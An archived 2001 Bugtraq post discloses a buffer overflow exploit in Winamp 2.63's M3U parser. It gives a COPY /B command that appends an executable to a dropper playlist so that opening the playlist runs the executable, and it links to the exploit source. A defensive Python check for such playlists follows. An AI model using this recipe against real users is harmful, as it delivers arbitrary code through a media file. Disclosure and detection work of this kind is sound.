[19982] in bugtraq
Winamp 2.63 full disclosure exploit
daemon@ATHENA.MIT.EDU (ByteRage)
Sun Apr 1 13:15:55 2001
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1892066601-986129809=:61574"
Message-ID: <20010401125649.62154.qmail@web13008.mail.yahoo.com>
Date: Sun, 1 Apr 2001 05:56:49 -0700
Reply-To: ByteRage <byterage@YAHOO.COM>
From: ByteRage <byterage@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
--0-1892066601-986129809=:61574
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Hi all,

I have written a full disclosure buffer overflow
exploit for the Winamp 2.63 buffer overflow found in
the M3U file parser...

Attached is a file called DROPPER.M3U, if you execute
the following commands in DOS:

COPY /B DROPPER.M3U+C:\WINDOWS\CDPLAYER.EXE HACKME.M3U

when you click HACKME.M3U, the file will drop and
execute the appended exe file, CDPLAYER.EXE in this
case...

The CPP source for creating DROPPER.M3U is @
http://elf.box.sk/byterage/wa263bof.cpp
and more info can be got from
http://elf.box.sk/byterage/wa263.htm

I haven't tested the exploit yet on 2.64 or underlying
versions, but if the versions of IN_MOD.DLL match,
those versions are vulnerable too...

greetz,
[ByteRage] http://elf.box.sk/byterage/
--0-1892066601-986129809=:61574
Content-Type: audio/mpegurl; name="dropper.m3u"
Content-Transfer-Encoding: base64
Content-Description: dropper.m3u
Content-Disposition: attachment; filename="dropper.m3u"
--0-1892066601-986129809=:61574--
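
A defender-side check for the construction described in the message above (a playlist with an executable appended by COPY /B), given as an added example that is not part of the original post or of ByteRage's code. The 260-byte entry limit, the function names and the sample data are assumptions made for illustration; the post does not state the buffer size.

```python
# Added triage example, not code from the original post.
import re

MAX_ENTRY_LEN = 260  # assumption: MAX_PATH-sized limit, not a value from the post


def has_embedded_pe(data: bytes) -> bool:
    """True if any 'MZ' header's e_lfanew field (offset 0x3C) points at 'PE\\0\\0'."""
    pos = data.find(b"MZ")
    while pos != -1:
        lfanew = int.from_bytes(data[pos + 0x3C:pos + 0x40], "little")
        if data[pos + lfanew:pos + lfanew + 4] == b"PE\0\0":
            return True
        pos = data.find(b"MZ", pos + 1)  # keep looking past false starts
    return False


def triage_m3u(data: bytes) -> list:
    """Return the reasons a playlist should not be handed to a player."""
    findings = []
    # An M3U file is line-oriented text: one path, URL or #EXT directive per line.
    longest = max(len(line) for line in re.split(rb"\r\n|\r|\n", data))
    if longest > MAX_ENTRY_LEN:
        findings.append(f"entry of {longest} bytes exceeds {MAX_ENTRY_LEN}")
    # Control bytes other than TAB/LF/CR do not belong in a text playlist.
    ctrl = sum(b < 0x20 and b not in (9, 10, 13) for b in data)
    if ctrl:
        findings.append(f"{ctrl} control bytes in a text playlist")
    if has_embedded_pe(data):
        findings.append("embedded PE image (MZ header with valid e_lfanew)")
    return findings


# Constructed samples (not taken from dropper.m3u): a normal playlist, and an
# overlong entry followed by a header-only MZ/PE stub standing in for an
# appended executable.
CLEAN = b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nC:\\MUSIC\\TRACK01.MP3\r\n"
STUB = b"MZ" + b"\0" * 58 + (64).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 20
SUSPECT = b"A" * 600 + b"\r\n" + STUB

if __name__ == "__main__":
    for name, blob in (("clean.m3u", CLEAN), ("suspect.m3u", SUSPECT)):
        print(name, triage_m3u(blob) or "no findings")
```

The PE check only matches Win32 images; a plain DOS executable appended the same way would still be caught by the control-byte count.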